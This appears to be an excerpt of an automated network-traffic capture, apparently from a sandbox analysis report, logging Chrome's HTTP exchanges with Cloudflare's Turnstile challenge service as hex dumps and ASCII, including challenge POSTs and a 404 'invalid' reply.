                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-20 15:46:15 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4e 6a 6f 4f 35 66 49 6f 6d 64 2d 4e 4e 74 6b 36 71 38 44 78 66 77 6f 74 75 55 57 59 68 39 51 4b 65 48 59 42 34 4e 2d 5a 33 45 34 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gNjoO5fIomd-NNtk6q8DxfwotuUWYh9QKeHYB4N-Z3E4AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                                2024-12-20 15:46:15 UTC1INData Raw: 4a
                                                                                                                                                                                                                                                Data Ascii: J


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                70192.168.2.1149921104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:16 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/754265710:1734707715:oBMT5532Ii6sPNFHOfKD9tGFk1HjF6gPP9GcopH_rJw/8f50c3606cea43b9/2dqSYWK0Dd5nXPHgk9S1pzxDycBFfDqXb6x9mdxK90c-1734709565-1.1.1.1-yzCAYJr.4lhCJtr.2hHLhx9zHosqDbEA0AI8gSibNVVtpRjzXyrmk_Bja6dIoTRH HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 31341
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                CF-Challenge: 2dqSYWK0Dd5nXPHgk9S1pzxDycBFfDqXb6x9mdxK90c-1734709565-1.1.1.1-yzCAYJr.4lhCJtr.2hHLhx9zHosqDbEA0AI8gSibNVVtpRjzXyrmk_Bja6dIoTRH
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:16 UTC16384OUTData Raw: 76 5f 38 66 35 30 63 33 36 30 36 63 65 61 34 33 62 39 3d 6c 6b 79 49 43 53 42 77 69 6a 6b 42 69 6f 77 42 5a 65 33 65 4e 6f 35 42 4c 6c 42 43 65 41 55 49 53 2d 69 42 30 65 35 49 37 79 46 38 6c 66 34 5a 79 65 6c 53 65 4f 79 42 6a 65 6b 49 39 52 53 6e 49 6f 36 65 25 32 62 47 7a 65 65 7a 65 53 58 65 76 65 79 58 65 67 65 32 38 50 63 36 65 46 79 65 4a 48 49 53 58 69 58 42 4d 63 74 77 65 2d 49 65 76 57 65 6c 24 49 42 73 6f 39 6e 71 4d 64 63 43 6c 42 65 65 6a 30 65 6a 51 56 30 65 56 46 47 65 45 49 65 66 65 42 74 24 65 52 74 4b 72 49 79 65 64 49 46 62 58 63 79 39 6b 50 35 7a 45 65 52 39 54 47 6a 42 69 78 30 6b 51 56 46 68 30 53 39 2d 69 49 65 32 36 72 6b 53 77 6c 56 65 50 43 76 53 65 4a 78 47 66 56 76 6f 65 52 67 55 6f 56 52 4a 4a 44 5a 6c 32 71 78 53 44 24 71 6c
                                                                                                                                                                                                                                                Data Ascii: v_8f50c3606cea43b9=lkyICSBwijkBiowBZe3eNo5BLlBCeAUIS-iB0e5I7yF8lf4ZyelSeOyBjekI9RSnIo6e%2bGzeezeSXeveyXege28Pc6eFyeJHISXiXBMctwe-IevWel$IBso9nqMdcClBeej0ejQV0eVFGeEIefeBt$eRtKrIyedIFbXcy9kP5zEeR9TGjBix0kQVFh0S9-iIe26rkSwlVePCvSeJxGfVvoeRgUoVRJJDZl2qxSD$ql
                                                                                                                                                                                                                                                2024-12-20 15:46:16 UTC14957OUTData Raw: 78 4d 35 65 54 49 2b 42 54 70 48 79 64 74 35 6b 30 42 4d 52 47 56 42 35 56 65 65 37 59 58 79 63 49 42 2b 46 7a 49 37 49 6a 79 42 30 49 55 36 32 56 53 33 49 4e 38 6e 79 49 53 65 65 65 4d 65 4f 5a 49 4d 65 37 65 53 79 65 62 65 36 6b 46 58 65 74 65 30 4f 42 6f 58 7a 65 36 39 65 34 65 69 77 52 56 53 32 79 35 49 37 56 46 4d 65 57 58 6c 66 52 77 65 6e 65 52 49 53 53 65 6a 51 52 79 53 38 65 24 49 36 69 65 47 65 74 49 52 69 65 68 49 53 78 65 69 53 6a 65 67 49 42 58 46 5a 65 72 4c 43 35 37 47 65 55 36 6a 65 6f 56 48 6e 47 30 4f 42 55 36 5a 65 37 49 65 2d 65 48 69 32 49 42 6f 58 77 49 36 59 65 2d 65 37 69 6e 49 6f 6a 65 70 2d 6a 65 46 62 65 47 71 53 49 65 72 49 47 56 4f 65 53 35 68 33 56 32 56 53 66 65 6e 6b 30 4f 53 7a 65 38 35 6f 65 2d 39 56 74 44 37 53 46 62 65
                                                                                                                                                                                                                                                Data Ascii: xM5eTI+BTpHydt5k0BMRGVB5Vee7YXycIB+FzI7IjyB0IU62VS3IN8nyISeeeMeOZIMe7eSyebe6kFXete0OBoXze69e4eiwRVS2y5I7VFMeWXlfRweneRISSejQRyS8e$I6ieGetIRiehISxeiSjegIBXFZerLC57GeU6jeoVHnG0OBU6Ze7Ie-eHi2IBoXwI6Ye-e7inIojep-jeFbeGqSIerIGVOeS5h3V2VSfenk0OSze85oe-9VtD7SFbe
                                                                                                                                                                                                                                                2024-12-20 15:46:17 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:16 GMT
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 26316
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-chl-gen: D8PSl3h8RP5H69YzLe9ScRRwWt4RjrPS8FNVYSIWSY2hDO08F+NvpP0k8nSeADYyaUfs1L5eewNrYK3u$zm4Lp5QyMxEF8iGB
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c3a64c8a41cf-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:17 UTC1039INData Raw: 77 63 71 64 69 72 32 49 71 4c 66 45 6a 62 43 39 77 35 2b 68 32 4b 37 55 30 74 4f 55 32 4b 7a 58 6d 4e 7a 66 77 74 7a 67 33 37 4c 6c 6d 38 75 2f 74 4c 76 71 32 64 7a 51 37 65 66 54 72 75 58 68 31 76 6a 62 2f 4f 69 33 33 37 7a 70 30 4e 76 43 37 2b 4d 43 32 65 49 49 34 77 54 73 78 75 66 38 2b 38 38 4b 38 77 2f 50 35 67 48 6e 38 75 72 36 35 65 2f 63 38 68 48 33 44 42 58 75 37 65 58 76 2f 42 55 47 41 42 34 71 39 76 33 34 49 4f 6a 75 43 69 45 4a 4d 79 49 43 4e 52 51 47 4c 52 37 33 43 7a 44 39 45 68 41 50 4a 79 56 44 47 6b 51 65 48 69 6b 6a 53 69 70 43 45 6c 49 55 44 45 35 45 4f 6b 34 35 4b 56 59 62 54 79 6c 66 50 54 34 68 54 7a 74 46 51 30 55 35 55 32 52 48 53 6b 41 2f 53 32 52 51 51 45 35 32 4e 30 74 55 52 31 77 31 66 6a 6b 31 63 31 4e 4b 59 33 46 44 68 58 6d
                                                                                                                                                                                                                                                Data Ascii: wcqdir2IqLfEjbC9w5+h2K7U0tOU2KzXmNzfwtzg37Llm8u/tLvq2dzQ7efTruXh1vjb/Oi337zp0NvC7+MC2eII4wTsxuf8+88K8w/P5gHn8ur65e/c8hH3DBXu7eXv/BUGAB4q9v34IOjuCiEJMyICNRQGLR73CzD9EhAPJyVDGkQeHikjSipCElIUDE5EOk45KVYbTylfPT4hTztFQ0U5U2RHSkA/S2RQQE52N0tUR1w1fjk1c1NKY3FDhXm
                                                                                                                                                                                                                                                2024-12-20 15:46:17 UTC1369INData Raw: 49 6b 59 72 4b 7a 5a 69 4f 74 4e 69 52 76 63 37 4d 32 4e 53 35 73 72 44 42 30 39 4c 68 34 65 65 72 7a 4d 65 35 37 39 54 6e 73 4e 44 33 77 4e 4c 4a 37 66 66 31 31 64 72 4e 37 39 6f 44 35 41 58 6a 78 64 50 36 42 77 4d 4e 34 77 50 65 2f 68 49 44 41 4e 2f 54 35 74 63 52 31 65 6a 30 37 64 62 30 2b 4f 72 54 32 65 50 75 32 79 4d 57 39 78 6b 67 48 79 51 42 44 43 6e 72 37 78 7a 7a 37 4f 33 7a 4d 75 34 4b 4a 51 34 54 44 50 41 33 4e 66 7a 38 47 44 6b 7a 49 54 78 44 53 42 7a 39 4c 44 77 47 49 55 42 53 51 78 41 6d 4b 45 30 58 4b 6b 73 70 4b 68 63 2f 46 6a 45 68 46 45 73 37 49 7a 5a 62 58 57 42 62 4e 32 77 35 51 45 59 2f 5a 57 6c 4e 55 6b 31 6e 52 45 78 48 55 57 30 33 58 6d 70 4f 65 55 6c 78 67 47 39 5a 66 30 52 31 5a 49 5a 37 56 6a 39 6a 66 55 31 6f 6b 34 68 52 61 6d
                                                                                                                                                                                                                                                Data Ascii: IkYrKzZiOtNiRvc7M2NS5srDB09Lh4eerzMe579TnsND3wNLJ7ff11drN79oD5AXjxdP6BwMN4wPe/hIDAN/T5tcR1ej07db0+OrT2ePu2yMW9xkgHyQBDCnr7xzz7O3zMu4KJQ4TDPA3Nfz8GDkzITxDSBz9LDwGIUBSQxAmKE0XKkspKhc/FjEhFEs7IzZbXWBbN2w5QEY/ZWlNUk1nRExHUW03XmpOeUlxgG9Zf0R1ZIZ7Vj9jfU1ok4hRam
                                                                                                                                                                                                                                                2024-12-20 15:46:17 UTC1369INData Raw: 74 4b 36 57 6e 4e 4b 61 30 62 47 38 77 70 32 34 31 63 6e 6f 77 39 79 6b 33 39 6e 70 36 73 53 74 38 63 37 4a 35 50 48 49 37 4d 7a 77 74 4f 33 52 2f 50 72 78 37 64 6e 37 78 4d 66 57 78 2f 51 41 79 4d 6a 50 79 38 67 4b 78 65 38 50 41 4d 6e 32 45 41 67 4b 47 77 33 39 2f 67 34 41 38 42 34 6a 39 2f 7a 6a 4b 52 76 79 4c 43 67 4a 39 69 4c 37 37 42 49 4e 38 50 50 77 44 67 34 46 42 54 72 38 4d 67 63 62 50 53 78 44 4c 54 4d 78 46 7a 34 47 50 6b 64 44 43 69 45 65 53 43 41 64 50 7a 38 53 4a 51 6c 4c 47 55 67 58 4d 53 68 4d 47 7a 42 53 57 42 31 42 5a 6c 64 56 55 57 4e 57 56 30 64 64 57 32 56 66 5a 30 52 4f 5a 6a 42 6d 55 69 39 49 4f 46 70 74 57 30 78 31 62 44 78 4b 54 33 4e 34 67 33 46 6d 69 6c 68 45 59 34 46 76 6a 6e 70 6f 55 45 70 2f 52 32 5a 50 6a 35 42 54 55 58 4e
                                                                                                                                                                                                                                                Data Ascii: tK6WnNKa0bG8wp241cnow9yk39np6sSt8c7J5PHI7MzwtO3R/Prx7dn7xMfWx/QAyMjPy8gKxe8PAMn2EAgKGw39/g4A8B4j9/zjKRvyLCgJ9iL77BIN8PPwDg4FBTr8MgcbPSxDLTMxFz4GPkdDCiEeSCAdPz8SJQlLGUgXMShMGzBSWB1BZldVUWNWV0ddW2VfZ0ROZjBmUi9IOFptW0x1bDxKT3N4g3FmilhEY4FvjnpoUEp/R2ZPj5BTUXN
                                                                                                                                                                                                                                                2024-12-20 15:46:17 UTC1369INData Raw: 64 72 4e 77 72 75 30 70 72 71 68 35 4f 36 6c 35 4c 72 43 72 4c 2f 6b 35 50 66 46 78 4f 48 69 75 2f 6e 58 37 39 6a 58 2b 66 72 73 34 72 77 43 32 39 44 4a 32 77 6e 56 37 51 4c 4e 79 2b 30 4e 35 2b 72 39 35 77 62 54 47 75 63 4e 46 42 6e 55 39 52 30 55 32 64 73 66 33 78 4d 6e 36 42 4d 46 34 75 77 6e 42 4f 6b 71 37 7a 4c 6c 45 75 63 58 39 2f 45 4d 4f 69 73 73 2b 78 6e 32 41 66 34 66 41 52 78 48 4b 41 55 49 4e 6a 67 31 50 45 63 4c 53 55 4d 75 44 79 41 39 54 52 4e 43 4d 52 4d 57 56 56 55 33 50 7a 64 67 51 56 30 37 52 6c 6f 6c 61 56 6b 32 59 6d 51 34 4f 45 73 37 57 32 4a 6e 51 32 67 7a 52 31 46 42 55 56 56 77 65 46 35 54 64 46 5a 57 57 57 39 2b 67 33 56 54 56 57 52 6b 64 46 68 61 58 34 39 69 59 32 36 54 54 49 35 68 69 6d 35 6e 68 35 42 7a 58 49 6c 70 62 36 4f 6a
                                                                                                                                                                                                                                                Data Ascii: drNwru0prqh5O6l5LrCrL/k5PfFxOHiu/nX79jX+frs4rwC29DJ2wnV7QLNy+0N5+r95wbTGucNFBnU9R0U2dsf3xMn6BMF4uwnBOkq7zLlEucX9/EMOiss+xn2Af4fARxHKAUINjg1PEcLSUMuDyA9TRNCMRMWVVU3PzdgQV07RlolaVk2YmQ4OEs7W2JnQ2gzR1FBUVVweF5TdFZWWW9+g3VTVWRkdFhaX49iY26TTI5him5nh5BzXIlpb6Oj
                                                                                                                                                                                                                                                2024-12-20 15:46:17 UTC1369INData Raw: 4c 6c 34 65 62 4f 77 50 48 47 36 50 53 76 79 4f 79 31 72 72 58 79 7a 38 62 71 79 74 47 32 76 75 37 77 77 4e 2f 50 2b 75 6e 47 30 77 48 64 31 2f 6b 43 43 4f 7a 61 33 78 48 79 31 75 63 56 47 4e 6e 54 38 52 73 4a 48 2b 37 74 34 74 34 50 46 52 51 4a 41 43 49 5a 4a 51 6b 42 42 43 55 49 47 79 37 75 43 53 51 52 41 68 55 62 42 7a 45 30 47 66 30 50 39 69 6f 74 4d 67 41 2b 42 41 59 66 2b 79 73 30 49 43 45 75 4c 68 73 52 53 79 68 46 4c 79 6b 79 57 56 68 57 4e 6a 67 75 55 44 4d 75 51 30 45 31 4d 44 70 61 51 57 6b 68 59 55 4a 66 53 69 64 50 5a 48 46 53 52 53 78 78 56 6c 4e 36 61 56 64 50 63 48 31 56 57 6b 35 54 62 56 5a 51 59 6a 6c 69 66 46 74 66 59 32 70 76 64 32 70 63 58 33 52 72 59 55 32 59 64 32 53 59 6a 48 5a 6f 56 6e 6c 7a 65 31 32 67 66 70 5a 2f 67 6f 53 70 70
                                                                                                                                                                                                                                                Data Ascii: Ll4ebOwPHG6PSvyOy1rrXyz8bqytG2vu7wwN/P+unG0wHd1/kCCOza3xHy1ucVGNnT8RsJH+7t4t4PFRQJACIZJQkBBCUIGy7uCSQRAhUbBzE0Gf0P9iotMgA+BAYf+ys0ICEuLhsRSyhFLykyWVhWNjguUDMuQ0E1MDpaQWkhYUJfSidPZHFSRSxxVlN6aVdPcH1VWk5TbVZQYjlifFtfY2pvd2pcX3RrYU2Yd2SYjHZoVnlze12gfpZ/goSpp
                                                                                                                                                                                                                                                2024-12-20 15:46:17 UTC1369INData Raw: 6b 36 2b 76 6f 77 36 6a 76 79 4e 72 6e 33 4e 76 38 75 75 6e 35 39 41 4c 6b 34 2f 7a 42 2b 76 30 46 77 65 7a 74 37 73 76 34 79 74 76 51 2b 39 49 57 45 68 54 56 38 77 34 53 46 51 6b 59 47 67 72 76 46 68 72 67 31 79 41 67 42 79 59 6a 44 42 62 71 4a 52 38 6b 38 53 59 68 42 43 6b 33 4e 42 67 48 4c 69 67 79 4c 68 30 73 2b 68 73 32 4e 7a 6f 39 52 44 49 63 52 55 52 45 4e 55 49 2b 54 44 6b 77 51 6a 55 53 4d 46 46 50 51 6b 35 4b 55 6b 5a 65 57 6c 77 61 4d 42 56 63 4e 55 64 55 53 55 68 70 4a 31 5a 6d 59 57 35 52 55 47 6b 75 5a 32 70 78 4c 6c 6c 61 57 7a 68 6c 4e 30 67 39 64 32 6c 67 63 47 55 2b 67 6e 36 41 63 57 52 2b 69 57 42 35 66 6f 32 4a 67 6d 46 7a 54 6e 4e 57 68 48 68 73 56 34 5a 37 65 31 79 4d 63 6f 4e 68 6a 33 4f 45 68 5a 53 64 61 71 6d 6f 61 6e 79 6a 71 6f
                                                                                                                                                                                                                                                Data Ascii: k6+vow6jvyNrn3Nv8uun59ALk4/zB+v0Fwezt7sv4ytvQ+9IWEhTV8w4SFQkYGgrvFhrg1yAgByYjDBbqJR8k8SYhBCk3NBgHLigyLh0s+hs2Nzo9RDIcRURENUI+TDkwQjUSMFFPQk5KUkZeWlwaMBVcNUdUSUhpJ1ZmYW5RUGkuZ2pxLllaWzhlN0g9d2lgcGU+gn6AcWR+iWB5fo2JgmFzTnNWhHhsV4Z7e1yMcoNhj3OEhZSdaqmoanyjqo
                                                                                                                                                                                                                                                2024-12-20 15:46:17 UTC1369INData Raw: 38 50 6e 70 38 73 37 35 38 66 62 6f 41 76 54 2b 77 64 2f 31 41 64 72 54 2f 41 54 4a 39 66 34 47 7a 65 66 4d 43 2b 59 57 45 41 34 42 35 77 6f 54 37 76 4d 4e 46 2f 4d 4f 46 68 76 32 39 78 63 65 35 51 67 61 49 79 58 33 49 43 76 74 45 43 41 71 42 77 51 78 4c 67 73 49 4c 44 4d 31 45 50 67 33 4b 52 51 33 4f 67 48 33 51 44 34 62 53 6a 35 44 49 44 70 43 53 41 34 77 52 45 74 4e 4c 45 70 4e 46 6a 52 4e 56 78 70 47 55 6c 59 7a 59 6c 4e 62 58 54 78 67 58 69 5a 41 4a 57 4e 6c 56 6c 78 6d 51 30 52 69 61 54 4a 49 5a 32 39 4d 5a 6d 39 79 54 31 68 75 64 6a 35 51 63 58 78 43 59 48 65 44 52 6e 4a 36 67 6b 70 6b 67 34 5a 6a 63 49 79 4b 55 55 68 52 6a 56 5a 77 6c 5a 46 61 61 49 2b 58 63 36 4b 55 6e 58 69 53 6d 70 36 68 64 4a 69 6a 6c 5a 61 6a 70 57 31 6b 62 61 6c 79 6e 71 69
                                                                                                                                                                                                                                                Data Ascii: 8Pnp8s758fboAvT+wd/1AdrT/ATJ9f4GzefMC+YWEA4B5woT7vMNF/MOFhv29xce5QgaIyX3ICvtECAqBwQxLgsILDM1EPg3KRQ3OgH3QD4bSj5DIDpCSA4wREtNLEpNFjRNVxpGUlYzYlNbXTxgXiZAJWNlVlxmQ0RiaTJIZ29MZm9yT1hudj5QcXxCYHeDRnJ6gkpkg4ZjcIyKUUhRjVZwlZFaaI+Xc6KUnXiSmp6hdJijlZajpW1kbalynqi
                                                                                                                                                                                                                                                2024-12-20 15:46:17 UTC1369INData Raw: 50 50 35 41 72 7a 33 31 39 4c 39 2f 50 37 39 36 51 62 74 79 73 30 4c 7a 4f 2f 6f 42 76 51 47 31 52 50 54 79 2f 41 4f 2f 41 37 64 47 39 77 57 47 52 59 65 45 67 67 67 39 68 4c 6f 49 42 59 61 49 69 30 42 4a 53 63 77 38 43 72 77 4c 77 73 69 2b 53 77 62 4a 76 77 30 4b 69 34 32 4f 79 35 47 41 54 59 47 4f 54 35 49 43 55 49 4a 51 6b 6f 67 50 55 51 32 55 6c 5a 4b 54 30 35 46 56 6a 35 61 48 6c 73 64 56 6c 6c 59 4f 46 4a 48 59 44 70 57 4a 56 38 71 58 6c 74 72 4c 53 39 70 56 56 35 79 59 6e 4d 31 63 6a 70 33 4f 54 64 31 64 56 52 75 62 58 78 57 67 6b 46 38 52 6e 70 6c 68 30 6c 67 68 58 46 36 6a 6e 75 50 55 47 78 57 67 47 71 43 63 5a 4a 59 6a 70 57 42 69 70 35 39 6e 32 47 4f 66 5a 35 6b 6d 6d 71 6e 61 5a 61 46 70 34 47 69 71 5a 57 65 73 71 43 7a 64 61 4b 52 73 34 32 75
                                                                                                                                                                                                                                                Data Ascii: PP5Arz319L9/P796Qbtys0LzO/oBvQG1RPTy/AO/A7dG9wWGRYeEggg9hLoIBYaIi0BJScw8CrwLwsi+SwbJvw0Ki42Oy5GATYGOT5ICUIJQkogPUQ2UlZKT05FVj5aHlsdVllYOFJHYDpWJV8qXltrLS9pVV5yYnM1cjp3OTd1dVRubXxWgkF8Rnplh0lghXF6jnuPUGxWgGqCcZJYjpWBip59n2GOfZ5kmmqnaZaFp4GiqZWesqCzdaKRs42u


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                71192.168.2.1149928104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:18 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/754265710:1734707715:oBMT5532Ii6sPNFHOfKD9tGFk1HjF6gPP9GcopH_rJw/8f50c3606cea43b9/2dqSYWK0Dd5nXPHgk9S1pzxDycBFfDqXb6x9mdxK90c-1734709565-1.1.1.1-yzCAYJr.4lhCJtr.2hHLhx9zHosqDbEA0AI8gSibNVVtpRjzXyrmk_Bja6dIoTRH HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:19 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:19 GMT
                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                cf-chl-out: xKEjLBVImMe5FLCxo90hAAx0zrdYyQk1rOA=$P6pi8UQZ3qbrh0/D
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c3b4d8a64376-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:19 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                72192.168.2.1149941104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:24 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/754265710:1734707715:oBMT5532Ii6sPNFHOfKD9tGFk1HjF6gPP9GcopH_rJw/8f50c3606cea43b9/2dqSYWK0Dd5nXPHgk9S1pzxDycBFfDqXb6x9mdxK90c-1734709565-1.1.1.1-yzCAYJr.4lhCJtr.2hHLhx9zHosqDbEA0AI8gSibNVVtpRjzXyrmk_Bja6dIoTRH HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 33755
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                CF-Challenge: 2dqSYWK0Dd5nXPHgk9S1pzxDycBFfDqXb6x9mdxK90c-1734709565-1.1.1.1-yzCAYJr.4lhCJtr.2hHLhx9zHosqDbEA0AI8gSibNVVtpRjzXyrmk_Bja6dIoTRH
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:24 UTC16384OUTData Raw: 76 5f 38 66 35 30 63 33 36 30 36 63 65 61 34 33 62 39 3d 6c 6b 79 49 43 53 42 77 69 6a 6b 42 69 6f 77 42 5a 65 33 65 4e 6f 35 42 4c 6c 42 43 65 41 55 49 53 2d 69 42 30 65 35 49 37 79 46 38 6c 66 34 5a 79 65 6c 53 65 4f 79 42 6a 65 6b 49 39 52 53 6e 49 6f 36 65 25 32 62 47 7a 65 65 7a 65 53 58 65 76 65 79 58 65 67 65 32 38 50 63 36 65 46 79 65 4a 48 49 53 58 69 58 42 4d 63 74 77 65 2d 49 65 76 57 65 6c 24 49 42 73 6f 39 6e 71 4d 64 63 43 6c 42 65 65 6a 30 65 6a 51 56 30 65 56 46 47 65 45 49 65 66 65 42 74 24 65 52 74 4b 72 49 79 65 64 49 46 62 58 63 79 39 6b 50 35 7a 45 65 52 39 54 47 6a 42 69 78 30 6b 51 56 46 68 30 53 39 2d 69 49 65 32 36 72 6b 53 77 6c 56 65 50 43 76 53 65 4a 78 47 66 56 76 6f 65 52 67 55 6f 56 52 4a 4a 44 5a 6c 32 71 78 53 44 24 71 6c
                                                                                                                                                                                                                                                Data Ascii: v_8f50c3606cea43b9=lkyICSBwijkBiowBZe3eNo5BLlBCeAUIS-iB0e5I7yF8lf4ZyelSeOyBjekI9RSnIo6e%2bGzeezeSXeveyXege28Pc6eFyeJHISXiXBMctwe-IevWel$IBso9nqMdcClBeej0ejQV0eVFGeEIefeBt$eRtKrIyedIFbXcy9kP5zEeR9TGjBix0kQVFh0S9-iIe26rkSwlVePCvSeJxGfVvoeRgUoVRJJDZl2qxSD$ql
